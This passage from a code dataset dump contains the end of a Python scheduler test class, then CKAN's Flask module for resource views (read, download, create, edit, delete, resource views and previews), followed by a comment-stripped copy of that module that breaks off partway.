            if cpu in ko_cpus:
                time_ko += t
            total_time += t
        pct_ko = time_ko * 100 / total_time
        res = ResultBundle.from_bool(pct_ko < bad_cpu_margin_pct)
        res.add_metric("time spent on inappropriate CPUs", pct_ko, '%')
        res.add_metric("boost", boost, '%')
        return res
# Comment-stripped duplicate of SchedTunePlacementTest (dataset
# 'content_no_comment' column); the documented version appears earlier.
class SchedTunePlacementTest(SchedTuneBase):
    """Run SchedTunePlacementItem with prefer_idle at boosts 10% and 50%."""
    @classmethod
    def _create_test_bundles(cls, target, res_dir, **kwargs):
        for boost in [10, 50]:
            yield cls._create_test_bundle_item(
                target=target,
                res_dir=res_dir,
                item_cls=SchedTunePlacementItem,
                boost=boost,
                prefer_idle=True,
                **kwargs
            )
    def test_stune_task_placement(self, margin_pct=10) -> AggregatedResultBundle:
        item_res_bundles = [
            item.test_stune_task_placement(margin_pct)
            for item in self.test_bundles
        ]
        return AggregatedResultBundle(item_res_bundles, 'boost')
| true | true |
1c33333bbb025761b13dfdd9658ef772ab03d251 | 32,653 | py | Python | ckan/views/resource.py | end2end8x/ckan | 45ee306de2f667484b2d086519fb5335a73e36a5 | [
"Apache-2.0"
] | 58 | 2015-01-11T09:05:15.000Z | 2022-03-17T23:44:07.000Z | ckan/views/resource.py | end2end8x/ckan | 45ee306de2f667484b2d086519fb5335a73e36a5 | [
"Apache-2.0"
] | 1,467 | 2015-01-01T16:47:44.000Z | 2022-02-28T16:51:20.000Z | ckan/views/resource.py | end2end8x/ckan | 45ee306de2f667484b2d086519fb5335a73e36a5 | [
"Apache-2.0"
] | 17 | 2015-05-06T14:04:21.000Z | 2021-11-11T19:58:16.000Z | # encoding: utf-8
import cgi
import json
import logging
import flask
from flask.views import MethodView
import six
import ckan.lib.base as base
import ckan.lib.datapreview as lib_datapreview
import ckan.lib.helpers as h
import ckan.lib.navl.dictization_functions as dict_fns
import ckan.lib.uploader as uploader
import ckan.logic as logic
import ckan.model as model
import ckan.plugins as plugins
from ckan.common import _, g, request
from ckan.views.home import CACHE_PARAMETERS
from ckan.views.dataset import (
_get_pkg_template, _get_package_type, _setup_template_variables
)
Blueprint = flask.Blueprint
NotFound = logic.NotFound
NotAuthorized = logic.NotAuthorized
ValidationError = logic.ValidationError
check_access = logic.check_access
get_action = logic.get_action
tuplize_dict = logic.tuplize_dict
clean_dict = logic.clean_dict
parse_params = logic.parse_params
flatten_to_string_key = logic.flatten_to_string_key
log = logging.getLogger(__name__)
# Blueprint serving the /dataset/<id>/resource/... pages under the
# 'dataset_resource.*' endpoint namespace.
resource = Blueprint(
    u'dataset_resource',
    __name__,
    url_prefix=u'/dataset/<id>/resource',
    url_defaults={u'package_type': u'dataset'}
)
# Second blueprint with identical URL rules registered under the plain
# 'resource.*' endpoint names — presumably kept so older endpoint names
# keep resolving; confirm against the app's blueprint registration.
prefixed_resource = Blueprint(
    u'resource',
    __name__,
    url_prefix=u'/dataset/<id>/resource',
    url_defaults={u'package_type': u'dataset'}
)
def read(package_type, id, resource_id):
    """Render the read page for a single resource of a dataset.

    If an ``activity_id`` query parameter is supplied, the package dict is
    taken from that recorded activity instead of the current dataset, so
    an old version of the resource can be displayed.

    :param package_type: dataset type (from the blueprint URL defaults)
    :param id: dataset id or name
    :param resource_id: id of the resource to display
    """
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj,
        u'for_view': True
    }
    try:
        package = get_action(u'package_show')(context, {u'id': id})
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Dataset not found'))
    activity_id = request.params.get(u'activity_id')
    if activity_id:
        # view an 'old' version of the package, as recorded in the
        # activity stream
        current_pkg = package
        try:
            package = context['session'].query(model.Activity).get(
                activity_id
            ).data['package']
        except AttributeError:
            # .get() returned None: no activity record with that id
            base.abort(404, _(u'Dataset not found'))
        if package['id'] != current_pkg['id']:
            log.info(u'Mismatch between pkg id in activity and URL {} {}'
                     .format(package['id'], current_pkg['id']))
            # the activity is not for the package in the URL - don't allow
            # misleading URLs as could be malicious
            base.abort(404, _(u'Activity not found'))
        # The name is used lots in the template for links, so fix it to be
        # the current one. It's not displayed to the user anyway.
        package['name'] = current_pkg['name']
        # Don't crash on old (unmigrated) activity records, which do not
        # include resources or extras.
        package.setdefault(u'resources', [])
    # Locate the requested resource within the package.
    resource = None
    for res in package.get(u'resources', []):
        if res[u'id'] == resource_id:
            resource = res
            break
    if not resource:
        return base.abort(404, _(u'Resource not found'))
    # get package license info
    license_id = package.get(u'license_id')
    try:
        package[u'isopen'] = model.Package.get_license_register()[license_id
                                                                  ].isopen()
    except KeyError:
        # Unknown/absent license id: treat as not open.
        package[u'isopen'] = False
    resource_views = get_action(u'resource_view_list')(
        context, {
            u'id': resource_id
        }
    )
    resource[u'has_views'] = len(resource_views) > 0
    # Pick the view to show: the one named by ?view_id, else the first.
    current_resource_view = None
    view_id = request.args.get(u'view_id')
    if resource[u'has_views']:
        if view_id:
            current_resource_view = [
                rv for rv in resource_views if rv[u'id'] == view_id
            ]
            if len(current_resource_view) == 1:
                current_resource_view = current_resource_view[0]
            else:
                return base.abort(404, _(u'Resource view not found'))
        else:
            current_resource_view = resource_views[0]
    # required for nav menu
    pkg = context[u'package']
    dataset_type = pkg.type or package_type
    # TODO: remove
    g.package = package
    g.resource = resource
    g.pkg = pkg
    g.pkg_dict = package
    extra_vars = {
        u'resource_views': resource_views,
        u'current_resource_view': current_resource_view,
        u'dataset_type': dataset_type,
        u'pkg_dict': package,
        u'package': package,
        u'resource': resource,
        u'pkg': pkg,  # NB it is the current version of the dataset, so ignores
        # activity_id. Still used though in resource views for
        # backward compatibility
        u'is_activity_archive': bool(activity_id),
    }
    template = _get_pkg_template(u'resource_template', dataset_type)
    return base.render(template, extra_vars)
def download(package_type, id, resource_id, filename=None):
    """Serve a resource to the client.

    Uploaded files are streamed straight from storage; link-type
    resources redirect to the stored URL.
    """
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj
    }
    try:
        rsc = get_action(u'resource_show')(context, {u'id': resource_id})
        get_action(u'package_show')(context, {u'id': id})
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Resource not found'))

    if rsc.get(u'url_type') == u'upload':
        # Locally uploaded file: send it from disk.
        upload = uploader.get_resource_uploader(rsc)
        response = flask.send_file(upload.get_path(rsc[u'id']))
        mimetype = rsc.get(u'mimetype')
        if mimetype:
            response.headers[u'Content-Type'] = mimetype
        return response
    if u'url' not in rsc:
        return base.abort(404, _(u'No download is available'))
    return h.redirect_to(rsc[u'url'])
class CreateView(MethodView):
    """Form view for adding a resource to a dataset (new-dataset flow).

    ``post`` handles the various 'save' buttons of the multi-stage
    dataset-creation wizard; ``get`` renders the blank/prefilled form.
    """

    def post(self, package_type, id):
        """Create or update a resource, then route per the save button."""
        save_action = request.form.get(u'save')
        data = clean_dict(
            dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
        )
        data.update(clean_dict(
            dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
        ))

        # we don't want to include save as it is part of the form
        del data[u'save']
        resource_id = data.pop(u'id')

        context = {
            u'model': model,
            u'session': model.Session,
            u'user': g.user,
            u'auth_user_obj': g.userobj
        }

        # see if we have any data that we are trying to save
        data_provided = False
        for key, value in six.iteritems(data):
            if (
                (value or isinstance(value, cgi.FieldStorage))
                and key != u'resource_type'):
                data_provided = True
                break

        if not data_provided and save_action != u"go-dataset-complete":
            if save_action == u'go-dataset':
                # go to final stage of adddataset
                return h.redirect_to(u'{}.edit'.format(package_type), id=id)
            # see if we have added any resources
            try:
                data_dict = get_action(u'package_show')(context, {u'id': id})
            except NotAuthorized:
                return base.abort(403, _(u'Unauthorized to update dataset'))
            except NotFound:
                return base.abort(
                    404,
                    _(u'The dataset {id} could not be found.').format(id=id)
                )
            if not len(data_dict[u'resources']):
                # no data so keep on page
                msg = _(u'You must add at least one data resource')
                # On new templates do not use flash message
                errors = {}
                error_summary = {_(u'Error'): msg}
                return self.get(package_type, id, data, errors, error_summary)

            # XXX race condition if another user edits/deletes
            data_dict = get_action(u'package_show')(context, {u'id': id})
            get_action(u'package_update')(
                dict(context, allow_state_change=True),
                dict(data_dict, state=u'active')
            )
            return h.redirect_to(u'{}.read'.format(package_type), id=id)

        data[u'package_id'] = id
        try:
            if resource_id:
                data[u'id'] = resource_id
                get_action(u'resource_update')(context, data)
            else:
                get_action(u'resource_create')(context, data)
        except ValidationError as e:
            errors = e.error_dict
            error_summary = e.error_summary
            # A failed upload cannot be re-submitted from the form; clear
            # the url fields and flag it so the template can explain.
            if data.get(u'url_type') == u'upload' and data.get(u'url'):
                data[u'url'] = u''
                data[u'url_type'] = u''
                data[u'previous_upload'] = True
            return self.get(package_type, id, data, errors, error_summary)
        except NotAuthorized:
            return base.abort(403, _(u'Unauthorized to create a resource'))
        except NotFound:
            return base.abort(
                404, _(u'The dataset {id} could not be found.').format(id=id)
            )
        if save_action == u'go-metadata':
            # XXX race condition if another user edits/deletes
            data_dict = get_action(u'package_show')(context, {u'id': id})
            get_action(u'package_update')(
                dict(context, allow_state_change=True),
                dict(data_dict, state=u'active')
            )
            return h.redirect_to(u'{}.read'.format(package_type), id=id)
        elif save_action == u'go-dataset':
            # go to first stage of add dataset
            return h.redirect_to(u'{}.edit'.format(package_type), id=id)
        elif save_action == u'go-dataset-complete':
            return h.redirect_to(u'{}.read'.format(package_type), id=id)
        else:
            # add more resources
            return h.redirect_to(
                u'{}_resource.new'.format(package_type),
                id=id
            )

    def get(
        self, package_type, id, data=None, errors=None, error_summary=None
    ):
        """Render the new-resource form, optionally with errors to show."""
        # get resources for sidebar
        context = {
            u'model': model,
            u'session': model.Session,
            u'user': g.user,
            u'auth_user_obj': g.userobj
        }
        try:
            pkg_dict = get_action(u'package_show')(context, {u'id': id})
        except NotFound:
            return base.abort(
                404, _(u'The dataset {id} could not be found.').format(id=id)
            )
        try:
            check_access(
                u'resource_create', context, {u"package_id": pkg_dict["id"]}
            )
        except NotAuthorized:
            return base.abort(
                403, _(u'Unauthorized to create a resource for this package')
            )
        package_type = pkg_dict[u'type'] or package_type

        errors = errors or {}
        error_summary = error_summary or {}
        extra_vars = {
            u'data': data,
            u'errors': errors,
            u'error_summary': error_summary,
            u'action': u'new',
            u'resource_form_snippet': _get_pkg_template(
                u'resource_form', package_type
            ),
            u'dataset_type': package_type,
            u'pkg_name': id,
            u'pkg_dict': pkg_dict
        }
        # Draft datasets use the wizard template with a stage indicator.
        template = u'package/new_resource_not_draft.html'
        if pkg_dict[u'state'].startswith(u'draft'):
            extra_vars[u'stage'] = ['complete', u'active']
            template = u'package/new_resource.html'
        return base.render(template, extra_vars)
class EditView(MethodView):
    """Form view for editing an existing resource."""

    def _prepare(self, id):
        """Build the action context and check package_update permission."""
        context = {
            u'model': model,
            u'session': model.Session,
            u'api_version': 3,
            u'for_edit': True,
            u'user': g.user,
            u'auth_user_obj': g.userobj
        }
        try:
            check_access(u'package_update', context, {u'id': id})
        except NotAuthorized:
            return base.abort(
                403,
                _(u'User %r not authorized to edit %s') % (g.user, id)
            )
        return context

    def post(self, package_type, id, resource_id):
        """Apply the submitted form data to the resource."""
        context = self._prepare(id)
        data = clean_dict(
            dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
        )
        data.update(clean_dict(
            dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
        ))

        # we don't want to include save as it is part of the form
        del data[u'save']
        data[u'package_id'] = id
        try:
            if resource_id:
                data[u'id'] = resource_id
                get_action(u'resource_update')(context, data)
            else:
                get_action(u'resource_create')(context, data)
        except ValidationError as e:
            # Re-render the form with validation errors.
            errors = e.error_dict
            error_summary = e.error_summary
            return self.get(
                package_type, id, resource_id, data, errors, error_summary
            )
        except NotAuthorized:
            return base.abort(403, _(u'Unauthorized to edit this resource'))
        return h.redirect_to(
            u'{}_resource.read'.format(package_type),
            id=id, resource_id=resource_id
        )

    def get(
        self,
        package_type,
        id,
        resource_id,
        data=None,
        errors=None,
        error_summary=None
    ):
        """Render the edit form for the resource."""
        context = self._prepare(id)
        pkg_dict = get_action(u'package_show')(context, {u'id': id})
        try:
            resource_dict = get_action(u'resource_show')(
                context, {
                    u'id': resource_id
                }
            )
        except NotFound:
            return base.abort(404, _(u'Resource not found'))
        # Draft datasets fall back to the new-resource wizard form.
        if pkg_dict[u'state'].startswith(u'draft'):
            return CreateView().get(package_type, id, data=resource_dict)

        # resource is fully created
        resource = resource_dict
        # set the form action
        form_action = h.url_for(
            u'{}_resource.edit'.format(package_type),
            resource_id=resource_id, id=id
        )
        if not data:
            data = resource_dict

        package_type = pkg_dict[u'type'] or package_type

        errors = errors or {}
        error_summary = error_summary or {}
        extra_vars = {
            u'data': data,
            u'errors': errors,
            u'error_summary': error_summary,
            u'action': u'edit',
            u'resource_form_snippet': _get_pkg_template(
                u'resource_form', package_type
            ),
            u'dataset_type': package_type,
            u'resource': resource,
            u'pkg_dict': pkg_dict,
            u'form_action': form_action
        }
        return base.render(u'package/resource_edit.html', extra_vars)
class DeleteView(MethodView):
    """Confirmation page and handler for deleting a resource."""

    def _prepare(self, id):
        """Build the action context and check package_delete permission."""
        context = {
            u'model': model,
            u'session': model.Session,
            u'user': g.user,
            u'auth_user_obj': g.userobj
        }
        try:
            check_access(u'package_delete', context, {u'id': id})
        except NotAuthorized:
            # NOTE(review): the %s placeholder is filled with an empty
            # string here, so the id never appears in the message.
            return base.abort(
                403,
                _(u'Unauthorized to delete package %s') % u''
            )
        return context

    def post(self, package_type, id, resource_id):
        """Delete the resource, unless the user pressed cancel."""
        if u'cancel' in request.form:
            return h.redirect_to(
                u'{}_resource.edit'.format(package_type),
                resource_id=resource_id, id=id
            )
        context = self._prepare(id)

        try:
            get_action(u'resource_delete')(context, {u'id': resource_id})
            h.flash_notice(_(u'Resource has been deleted.'))
            # NOTE(review): context is None here, so package_show runs
            # with a fresh default context — confirm this is intended.
            pkg_dict = get_action(u'package_show')(None, {u'id': id})
            if pkg_dict[u'state'].startswith(u'draft'):
                return h.redirect_to(
                    u'{}_resource.new'.format(package_type),
                    id=id
                )
            else:
                return h.redirect_to(u'{}.read'.format(package_type), id=id)
        except NotAuthorized:
            return base.abort(
                403,
                _(u'Unauthorized to delete resource %s') % u''
            )
        except NotFound:
            return base.abort(404, _(u'Resource not found'))

    def get(self, package_type, id, resource_id):
        """Render the delete-confirmation page."""
        context = self._prepare(id)
        try:
            resource_dict = get_action(u'resource_show')(
                context, {
                    u'id': resource_id
                }
            )
            pkg_id = id
        except NotAuthorized:
            return base.abort(
                403,
                _(u'Unauthorized to delete resource %s') % u''
            )
        except NotFound:
            return base.abort(404, _(u'Resource not found'))

        # TODO: remove
        g.resource_dict = resource_dict
        g.pkg_id = pkg_id

        return base.render(
            u'package/confirm_delete_resource.html', {
                u'dataset_type': _get_package_type(id),
                u'resource_dict': resource_dict,
                u'pkg_id': pkg_id
            }
        )
def views(package_type, id, resource_id):
    """Render the management page listing the views of a resource."""
    package_type = _get_package_type(id)
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'for_view': True,
        u'auth_user_obj': g.userobj
    }
    data_dict = {u'id': id}

    # Only users who may update the dataset can manage its views.
    try:
        check_access(u'package_update', context, data_dict)
    except NotAuthorized:
        return base.abort(
            403,
            _(u'User %r not authorized to edit %s') % (g.user, id)
        )

    # Make sure the package exists before touching its resources.
    try:
        pkg_dict = get_action(u'package_show')(context, data_dict)
        pkg = context[u'package']
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Dataset not found'))

    try:
        resource = get_action(u'resource_show')(
            context, {u'id': resource_id}
        )
        view_list = get_action(u'resource_view_list')(
            context, {u'id': resource_id}
        )
    except NotFound:
        return base.abort(404, _(u'Resource not found'))
    except NotAuthorized:
        return base.abort(403, _(u'Unauthorized to read resource %s') % id)

    _setup_template_variables(context, {u'id': id}, package_type=package_type)

    # TODO: remove
    g.pkg_dict = pkg_dict
    g.pkg = pkg
    g.resource = resource
    g.views = view_list

    extra_vars = {
        u'pkg_dict': pkg_dict,
        u'pkg': pkg,
        u'resource': resource,
        u'views': view_list
    }
    return base.render(u'package/resource_views.html', extra_vars)
def view(package_type, id, resource_id, view_id=None):
    """
    Embedded page for a resource view.

    Depending on the type, different views are loaded. This could be an
    img tag where the image is loaded directly or an iframe that embeds a
    webpage or a recline preview.
    """
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj
    }
    try:
        package = get_action(u'package_show')(context, {u'id': id})
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Dataset not found'))
    try:
        resource = get_action(u'resource_show')(context, {u'id': resource_id})
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Resource not found'))

    # The view definition comes either inline as JSON in the query string
    # or is looked up by its id.
    resource_view = None
    raw_view = request.params.get(u'resource_view', u'')
    if raw_view:
        try:
            resource_view = json.loads(raw_view)
        except ValueError:
            return base.abort(409, _(u'Bad resource view data'))
    elif view_id:
        try:
            resource_view = get_action(u'resource_view_show')(
                context, {u'id': view_id}
            )
        except (NotFound, NotAuthorized):
            return base.abort(404, _(u'Resource view not found'))

    if not resource_view or not isinstance(resource_view, dict):
        return base.abort(404, _(u'Resource view not supplied'))

    return h.rendered_resource_view(
        resource_view, resource, package, embed=True
    )
# FIXME: could anyone think about better name?
class EditResourceViewView(MethodView):
    """Form view for creating, updating, deleting and previewing a
    resource view."""

    def _prepare(self, id, resource_id):
        """Check resource_update permission and fetch the package and
        resource, returning ``(context, extra_vars)`` for the templates."""
        context = {
            u'model': model,
            u'session': model.Session,
            u'user': g.user,
            u'for_view': True,
            u'auth_user_obj': g.userobj
        }

        # update resource should tell us early if the user has privilages.
        try:
            check_access(u'resource_update', context, {u'id': resource_id})
        except NotAuthorized:
            return base.abort(
                403,
                _(u'User %r not authorized to edit %s') % (g.user, id)
            )
        # get resource and package data
        try:
            pkg_dict = get_action(u'package_show')(context, {u'id': id})
            pkg = context[u'package']
        except (NotFound, NotAuthorized):
            return base.abort(404, _(u'Dataset not found'))
        try:
            resource = get_action(u'resource_show')(
                context, {
                    u'id': resource_id
                }
            )
        except (NotFound, NotAuthorized):
            return base.abort(404, _(u'Resource not found'))

        # TODO: remove
        g.pkg_dict = pkg_dict
        g.pkg = pkg
        g.resource = resource

        extra_vars = dict(
            data={},
            errors={},
            error_summary={},
            view_type=None,
            to_preview=False,
            pkg_dict=pkg_dict,
            pkg=pkg,
            resource=resource
        )
        return context, extra_vars

    def post(self, package_type, id, resource_id, view_id=None):
        """Create/update/delete the view, or render a preview of it."""
        context, extra_vars = self._prepare(id, resource_id)
        data = clean_dict(
            dict_fns.unflatten(
                tuplize_dict(
                    parse_params(request.form, ignore_keys=CACHE_PARAMETERS)
                )
            )
        )
        data.pop(u'save', None)
        to_preview = data.pop(u'preview', False)
        if to_preview:
            context[u'preview'] = True
        to_delete = data.pop(u'delete', None)
        data[u'resource_id'] = resource_id
        data[u'view_type'] = request.args.get(u'view_type')

        try:
            if to_delete:
                data[u'id'] = view_id
                get_action(u'resource_view_delete')(context, data)
            elif view_id:
                data[u'id'] = view_id
                data = get_action(u'resource_view_update')(context, data)
            else:
                data = get_action(u'resource_view_create')(context, data)
        except ValidationError as e:
            # Could break preview if validation error
            to_preview = False
            # FIX: the original had a stray trailing comma here
            # (`e.error_dict,`) which wrapped the error dict in a 1-tuple,
            # so templates got a tuple where a dict was expected.
            extra_vars[u'errors'] = e.error_dict
            extra_vars[u'error_summary'] = e.error_summary
        except NotAuthorized:
            # This should never happen unless the user maliciously changed
            # the resource_id in the url.
            return base.abort(403, _(u'Unauthorized to edit resource'))
        else:
            if not to_preview:
                return h.redirect_to(
                    u'{}_resource.views'.format(package_type),
                    id=id, resource_id=resource_id
                )
        extra_vars[u'data'] = data
        extra_vars[u'to_preview'] = to_preview
        return self.get(package_type, id, resource_id, view_id, extra_vars)

    def get(
        self, package_type, id, resource_id, view_id=None, post_extra=None
    ):
        """Render the new/edit form for a resource view, optionally with
        a live preview of the configured view."""
        context, extra_vars = self._prepare(id, resource_id)
        to_preview = extra_vars[u'to_preview']
        if post_extra:
            extra_vars.update(post_extra)

        package_type = _get_package_type(id)
        data = extra_vars[u'data'] if u'data' in extra_vars else None

        if data and u'view_type' in data:
            view_type = data.get(u'view_type')
        else:
            view_type = request.args.get(u'view_type')

        # view_id exists only when updating
        if view_id:
            if not data or not view_type:
                try:
                    view_data = get_action(u'resource_view_show')(
                        context, {
                            u'id': view_id
                        }
                    )
                    view_type = view_data[u'view_type']
                    if data:
                        data.update(view_data)
                    else:
                        data = view_data
                except (NotFound, NotAuthorized):
                    return base.abort(404, _(u'View not found'))

            # might as well preview when loading good existing view
            if not extra_vars[u'errors']:
                to_preview = True

        data[u'view_type'] = view_type
        view_plugin = lib_datapreview.get_view_plugin(view_type)
        if not view_plugin:
            return base.abort(404, _(u'View Type Not found'))

        _setup_template_variables(
            context, {u'id': id}, package_type=package_type
        )

        data_dict = {
            u'package': extra_vars[u'pkg_dict'],
            u'resource': extra_vars[u'resource'],
            u'resource_view': data
        }

        view_template = view_plugin.view_template(context, data_dict)
        form_template = view_plugin.form_template(context, data_dict)

        extra_vars.update({
            u'form_template': form_template,
            u'view_template': view_template,
            u'data': data,
            u'to_preview': to_preview,
            u'datastore_available': plugins.plugin_loaded(u'datastore')
        })
        extra_vars.update(
            view_plugin.setup_template_variables(context, data_dict) or {}
        )
        extra_vars.update(data_dict)

        if view_id:
            return base.render(u'package/edit_view.html', extra_vars)

        return base.render(u'package/new_view.html', extra_vars)
def _parse_recline_state(params):
    """Build a read-only recline state dict from query parameters.

    Returns ``None`` when the ``state_version`` parameter names an
    unsupported version (anything other than 1).

    :param params: mapping of query-string parameters (the caller passes
        ``request.args``); previously this argument was ignored and the
        global ``request.args`` was read directly — using the argument is
        equivalent for the sole call site and makes the helper testable.
    """
    state_version = int(params.get(u'state_version', u'1'))
    if state_version != 1:
        return None

    recline_state = {}
    # Decode any JSON-encoded parameter values; leave plain strings as-is.
    for k, v in params.items():
        try:
            v = h.json.loads(v)
        except ValueError:
            pass
        recline_state[k] = v
    recline_state.pop(u'width', None)
    recline_state.pop(u'height', None)
    recline_state[u'readOnly'] = True

    # previous versions of recline setup used elasticsearch_url attribute
    # for data api url - see http://trac.ckan.org/ticket/2639
    # fix by relocating this to url attribute which is the default location
    if u'dataset' in recline_state and u'elasticsearch_url' in recline_state[
        u'dataset'
    ]:
        recline_state[u'dataset'][u'url'] = recline_state[u'dataset'][
            u'elasticsearch_url'
        ]

    # Ensure only the currentView is available
    # default to grid view if none specified
    if not recline_state.get(u'currentView', None):
        recline_state[u'currentView'] = u'grid'
    # FIX: iterate over a snapshot of the keys — popping entries while
    # iterating the live dict view raises RuntimeError on Python 3.
    for k in list(recline_state.keys()):
        if k.startswith(u'view-') and \
                not k.endswith(recline_state[u'currentView']):
            recline_state.pop(k)
    return recline_state
def embedded_dataviewer(package_type, id, resource_id, width=500, height=500):
    """
    Embedded page for a read-only resource dataview. Allows
    for width and height to be specified as part of the
    querystring (as well as accepting them via routes).

    :param width: default iframe width, overridable by ?width=
    :param height: default iframe height, overridable by ?height=
    """
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj
    }
    try:
        resource = get_action(u'resource_show')(context, {u'id': resource_id})
        package = get_action(u'package_show')(context, {u'id': id})
        resource_json = h.json.dumps(resource)

        # double check that the resource belongs to the specified package
        if not resource[u'id'] in [r[u'id'] for r in package[u'resources']]:
            raise NotFound
        dataset_type = package[u'type'] or package_type
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Resource not found'))

    # Construct the recline state
    state_version = int(request.args.get(u'state_version', u'1'))
    recline_state = _parse_recline_state(request.args)
    if recline_state is None:
        return base.abort(
            400, (
                u'"state" parameter must be a valid recline '
                u'state (version %d)' % state_version
            )
        )

    recline_state = h.json.dumps(recline_state)

    # Clamp requested dimensions to a minimum of 100 pixels.
    width = max(int(request.args.get(u'width', width)), 100)
    height = max(int(request.args.get(u'height', height)), 100)
    embedded = True

    # TODO: remove
    g.resource = resource
    g.package = package
    g.resource_json = resource_json
    g.recline_state = recline_state
    g.width = width
    g.height = height
    g.embedded = embedded

    return base.render(
        u'package/resource_embedded_dataviewer.html', {
            u'dataset_type': dataset_type,
            u'resource': resource,
            u'package': package,
            u'resource_json': resource_json,
            u'width': width,
            u'height': height,
            u'embedded': embedded,
            u'recline_state': recline_state
        }
    )
def datapreview(package_type, id, resource_id):
    """
    Embedded page for a resource data-preview.

    Depending on the type, different previews are loaded. This could be an
    img tag where the image is loaded directly or an iframe that embeds a
    webpage, or a recline preview.
    """
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj
    }
    try:
        resource = get_action(u'resource_show')(context, {u'id': resource_id})
        package = get_action(u'package_show')(context, {u'id': id})

        data_dict = {u'resource': resource, u'package': package}

        # Find a preview plugin willing to render this resource.
        preview_plugin = lib_datapreview.get_preview_plugin(data_dict)

        if preview_plugin is None:
            return base.abort(409, _(u'No preview has been defined.'))

        preview_plugin.setup_template_variables(context, data_dict)
        resource_json = json.dumps(resource)
        dataset_type = package[u'type'] or package_type

        # TODO: remove
        g.resource = resource
        g.package = package
        g.resource_json = resource_json
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Resource not found'))
    else:
        return base.render(
            preview_plugin.preview_template(context, data_dict), {
                u'dataset_type': dataset_type,
                u'resource': resource,
                u'package': package,
                u'resource_json': resource_json
            }
        )
def register_dataset_plugin_rules(blueprint):
    """Attach every resource-related URL rule to *blueprint*.

    Registration order is preserved from the original implementation.
    """
    add = blueprint.add_url_rule
    add(u'/new', view_func=CreateView.as_view(str(u'new')))
    add(u'/<resource_id>', view_func=read, strict_slashes=False)
    add(u'/<resource_id>/edit', view_func=EditView.as_view(str(u'edit')))
    add(
        u'/<resource_id>/delete', view_func=DeleteView.as_view(str(u'delete'))
    )
    add(u'/<resource_id>/download', view_func=download)
    add(u'/<resource_id>/views', view_func=views)
    add(u'/<resource_id>/view', view_func=view)
    add(u'/<resource_id>/view/<view_id>', view_func=view)
    add(u'/<resource_id>/download/<filename>', view_func=download)

    # One MethodView instance shared by the new/edit view endpoints.
    _edit_view = EditResourceViewView.as_view(str(u'edit_view'))
    add(u'/<resource_id>/new_view', view_func=_edit_view)
    add(u'/<resource_id>/edit_view/<view_id>', view_func=_edit_view)

    add(u'/<resource_id>/embed', view_func=embedded_dataviewer)
    add(
        u'/<resource_id>/viewer',
        view_func=embedded_dataviewer,
        defaults={
            u'width': u"960",
            u'height': u"800"
        }
    )
    add(u'/<resource_id>/preview', view_func=datapreview)
# Register the same rule set on both blueprints so the endpoints resolve
# under the 'dataset_resource.*' and the plain 'resource.*' names.
register_dataset_plugin_rules(resource)
register_dataset_plugin_rules(prefixed_resource)
| 33.490256 | 79 | 0.578017 |
import cgi
import json
import logging
import flask
from flask.views import MethodView
import six
import ckan.lib.base as base
import ckan.lib.datapreview as lib_datapreview
import ckan.lib.helpers as h
import ckan.lib.navl.dictization_functions as dict_fns
import ckan.lib.uploader as uploader
import ckan.logic as logic
import ckan.model as model
import ckan.plugins as plugins
from ckan.common import _, g, request
from ckan.views.home import CACHE_PARAMETERS
from ckan.views.dataset import (
_get_pkg_template, _get_package_type, _setup_template_variables
)
Blueprint = flask.Blueprint
NotFound = logic.NotFound
NotAuthorized = logic.NotAuthorized
ValidationError = logic.ValidationError
check_access = logic.check_access
get_action = logic.get_action
tuplize_dict = logic.tuplize_dict
clean_dict = logic.clean_dict
parse_params = logic.parse_params
flatten_to_string_key = logic.flatten_to_string_key
log = logging.getLogger(__name__)
resource = Blueprint(
u'dataset_resource',
__name__,
url_prefix=u'/dataset/<id>/resource',
url_defaults={u'package_type': u'dataset'}
)
prefixed_resource = Blueprint(
u'resource',
__name__,
url_prefix=u'/dataset/<id>/resource',
url_defaults={u'package_type': u'dataset'}
)
def read(package_type, id, resource_id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj,
u'for_view': True
}
try:
package = get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
activity_id = request.params.get(u'activity_id')
if activity_id:
current_pkg = package
try:
package = context['session'].query(model.Activity).get(
activity_id
).data['package']
except AttributeError:
base.abort(404, _(u'Dataset not found'))
if package['id'] != current_pkg['id']:
log.info(u'Mismatch between pkg id in activity and URL {} {}'
.format(package['id'], current_pkg['id']))
# misleading URLs as could be malicious
base.abort(404, _(u'Activity not found'))
# The name is used lots in the template for links, so fix it to be
# the current one. It's not displayed to the user anyway.
package['name'] = current_pkg['name']
# include resources or extras.
package.setdefault(u'resources', [])
resource = None
for res in package.get(u'resources', []):
if res[u'id'] == resource_id:
resource = res
break
if not resource:
return base.abort(404, _(u'Resource not found'))
# get package license info
license_id = package.get(u'license_id')
try:
package[u'isopen'] = model.Package.get_license_register()[license_id
].isopen()
except KeyError:
package[u'isopen'] = False
resource_views = get_action(u'resource_view_list')(
context, {
u'id': resource_id
}
)
resource[u'has_views'] = len(resource_views) > 0
current_resource_view = None
view_id = request.args.get(u'view_id')
if resource[u'has_views']:
if view_id:
current_resource_view = [
rv for rv in resource_views if rv[u'id'] == view_id
]
if len(current_resource_view) == 1:
current_resource_view = current_resource_view[0]
else:
return base.abort(404, _(u'Resource view not found'))
else:
current_resource_view = resource_views[0]
# required for nav menu
pkg = context[u'package']
dataset_type = pkg.type or package_type
# TODO: remove
g.package = package
g.resource = resource
g.pkg = pkg
g.pkg_dict = package
extra_vars = {
